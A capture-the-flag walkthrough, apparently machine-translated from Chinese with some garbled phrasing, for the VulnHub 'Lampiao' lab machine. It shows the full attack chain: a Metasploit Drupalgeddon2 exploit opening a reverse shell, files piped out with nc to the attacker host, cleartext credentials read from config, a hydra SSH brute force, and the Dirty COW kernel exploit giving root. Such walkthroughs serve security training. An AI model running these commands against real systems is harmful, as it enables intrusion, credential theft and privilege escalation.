Lampiao drone
Readily write a drone writeup, check a lot of English blog, such as
https://xz.aliyun.com/t/2647
Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM
Download (Mirror): https://download.vulnhub.com/lampiao/Lampiao.zip
Download (Torrent): https://download.vulnhub.com/lampiao/Lampiao.zip.torrent ( Magnet)
攻击机 Kali 10.211.55.11 "root@kali-linux:"
靶机 IP 192.168.89.134 "tiago@lampiao"
penetration
port
root@kali-linux:~# nmap -p1-2000 192.168.89.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-03 22:13 HKT
Nmap scan report for 192.168.89.134
Host is up (1.0s latency).
Not shown: 1997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
PORT 1898
WEB SERVER
root@kali-linux:~# nikto -h 192.168.89.134:1898
+ Server: Apache/2.4.7 (Ubuntu)
...
+ "robots.txt" contains 68 entries which should be manually viewed.
...
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /sites/: Directory indexing found.
http://192.168.89.134:1898/CHANGELOG.txt
Drupal 7.54, 2017-02-01
root@kali-linux:~# msfdb start
[+] Starting database
root@kali-linux:~# msfconsole
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
2 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
3 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
4 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
5 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
6 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
7 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
8 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.89.134
rhost => 192.168.89.134
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show targets
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
...
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set target 0
target => 0
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 10.211.55.11:4444
[*] Sending stage (38247 bytes) to 10.211.55.2
[*] Meterpreter session 1 opened (10.211.55.11:4444 -> 10.211.55.2:49652) at 2019-06-03 22:42:55 +0800
meterpreter > shell
Process 3584 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$
tar czvf test.tar.gz *
nc -lvp 4445 > test.tar.gz
nc -w 3 10.211.55.11 4445 < test.tar.gz
root@kali-linux:~# nc -lvp 4445 > test.tar.gz
listening on [any] 4445 ...
10.211.55.2: inverse host lookup failed: Unknown host
connect to [10.211.55.11] from (UNKNOWN) [10.211.55.2] 49957
curl http://192.168.89.134:1898/test.tar.gz
下载>>audio.m4a>>"user tiago"
find . -name ".php" | xargs grep -H "password"*
'username' => 'drupaluser',
'password' => 'Virgulino',
PORT 22
cewl -w dict.txt http://192.168.89.134:1898/?q=node/1
hydra -l tiago -P dict.txt -vV -e ns 192.168.89.134 ssh
[22][ssh] host: 192.168.89.134 login: tiago password: Virgulino
ssh -A -p 22 [email protected]
Put right
tiago@lampiao:~$ uname -a
Lampiao Linux 4.4.0-31-generic # 50 ~ 14.04.1 Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU / Linux
wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit->suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation | exploits/windows/local/35905.c
Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities | exploits/ios/webapps/35775.txt
Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection | exploits/php/webapps/10788.txt
Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit) | exploits/linux/local/44696.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow | exploits/windows/local/1406.php
Photo Manager Pro 4.4.0 iOS - Code Execution | exploits/ios/webapps/36798.txt
Photo Manager Pro 4.4.0 iOS - Local File Inclusion | exploits/ios/webapps/36796.txt
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities | exploits/php/webapps/46549.txt
eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities | exploits/php/webapps/36089.txt
---------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 14.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
39 user space exploits
Possible Exploits:
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Tags: [ ubuntu=14.04{kernel:4.4.0-*} ],ubuntu=16.04{kernel:4.8.0-*}
Rank: 8
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-1000112/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Rank: 8
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Rank: 7
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Rank: 3
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Tags: [ ubuntu=14.04 ],fedora=22
Rank: 3
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Tags: debian=7.0|8.0,[ ubuntu=* ]
Rank: 3
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2015-1318] newpid (apport)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Tags: [ ubuntu=14.04 ]
Rank: 3
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-7308/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Rank: 1
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Tags: ubuntu=16.04{kernel:4.4.0-(21|38|42|98|140)-generic}
Rank: 1
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2015-1318] newpid (apport) 2
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Tags: ubuntu=14.04.2
Rank: 1
Download URL: https://www.exploit-db.com/download/36782
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Rank: 0
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
40611
tiago@lampiao:/tmp$ curl https://www.exploit-db.com/download/40611.c > dirtyc0w.c
tiago@lampiao:/tmp chmod 0404 foo
tiago@lampiao:/tmp$ gcc -pthread dirtyc0w.c -o dirtyc0w
dirtyc0w.c:1:1: error: expected identifier or ‘(’ before ‘<’ token
40847
tiago @ Lampiao: ~ / test $ wget https://www.exploit-db.com/download/40847.cpp
--2019-06-04 12:37:07-- https://www.exploit-db.com/download/40847.cpp
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2019-06-04 12:37:10 ERROR 404: Not Found.
can not download
https://www.exploit-db.com/exploits/40847
copy 正文
tiago @ Lampiao: ~ $ vim test / 40847.cpp
tiago @ Lampiao: ~ ls
dcow test
tiago @ Lampiao: ~ $ ./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#
Reproduced in: https: //www.jianshu.com/p/76e6fad4d68e